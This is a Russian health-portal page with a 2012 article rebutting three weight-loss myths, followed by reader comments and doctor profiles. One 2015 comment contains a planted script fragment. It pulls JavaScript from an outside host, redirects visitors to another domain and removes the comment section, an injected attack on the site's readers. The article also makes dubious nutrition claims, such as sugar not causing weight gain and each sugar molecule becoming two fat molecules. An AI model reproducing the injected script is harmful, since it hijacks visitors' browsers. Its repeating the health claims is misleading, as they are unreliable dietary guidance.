Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вся правда о похудении  >>  Вся правда о похудении
 
Обратная связь
 

Вся правда о похудении

Размер шрифта
24 января 2012 09:01
  • google_analytics: false
  • Нравится

От сладкого поправляются. Больше спорта – меньше жира. Похудеть можно быстро. Какие из этих утверждений о похудении верны?

1

Миф №1 «От сладкого поправляются».

Это неправда. Сладость продуктам придает сахар. В пищеварительном тракте он распадается на глюкозу и фруктозу. Глюкоза – главный источник энергии для организма. Именно поэтому мы так любим сладкие продукты: они лучшие остальных продуктов способны обеспечить нас энергией. 

У древних людей добыча пищи отнимала множество времени и сил. Им приходилось двигаться гораздо больше, чем нам. И вся полученная с пищей энергия благополучно тратилась.  

Каков же механизм сжигания калорий?

Во время бега в первую очередь расходуется глюкоза в мышцах, затем – глюкоза в печени. Если мы не двигаемся, то из каждой молекулы сахара при распаде получается две молекулы жира. Таким образом, поправляется человек не от количества съеденного сахара, а от того, что этот сахар, съеденный на диване перед телевизором, превращается в жир.   

Вывод: поправляемся мы не от сладкого, а от избытка калорий, большая часть которых в наш организм попадает вместе с жирами. Сравните сами: 1 г углеводов дает 4 ккал, а 1 г жира – 9 ккал.

1

Миф №2 «Чем больше заниматься спортом, тем быстрее можно похудеть».

Это неправда. Как сказано выше, при физических нагрузках расходуется сначала глюкоза в мышцах, затем в печени, и только потом в ход идет жир. Топками для липидов служат энергетические станции клеток – митохондрии, находящиеся в мышцах. Но проблема в том, что углеводы являются лучшим источником энергии, чем жир. Организм как можно дольше откладывает его про запас. 

Тело расходует запасенный жир с большой неохотой и с меньшей эффективностью, чем углеводы. Так как организм – энергозависимая система, его главной задачей будет наиболее экономное расходование энергии. Поэтому физические упражнения расходуют не так много калорий, как вам хотелось бы.

Ограничение потребления калорий – более эффективный способ похудения, чем физические упражнения. Другими словами, правильный рацион дает 80% успеха, а упражнения только 20%.

Когда человек худеет, наступает момент, когда снижение веса останавливается. Занятия спортом помогут создать в мышечной ткани больше митохондрий, своеобразных фабрик по сжиганию жира, а значит, у организма появится больше возможностей этот жир сжечь.

1

Миф №3 «Похудеть можно быстро».

Это ложь. Быстро худеть нельзя. ВОЗ рекомендует ограничить потерю веса до 2 кг для женщин и 4 кг для мужчин в месяц. Другими словами, за месяц потеря веса не должна превышать 2-3% от исходной массы тела. Превышение этого показателя опасно для здоровья. 

Похудение – это потеря лишнего веса. Однако, начав худеть, вы скорее потеряете объемы, а вес будет уходить медленнее. Объем уходит вместе со связанной жиром водой. Жировая масса более объемная и легкая, чем мышцы. Мышцы будут уплотняться и расти по мере того, как вы занимаетесь физическими упражнениями. Но физические упражнения – это всего 20% успеха в похудении. Все же и без них обойтись нельзя, так как мышцы – главная фабрика по сжиганию калорий в организме.


Сюжеты по теме:
Правда или ложь? Три утверждения о похудении

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:59

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.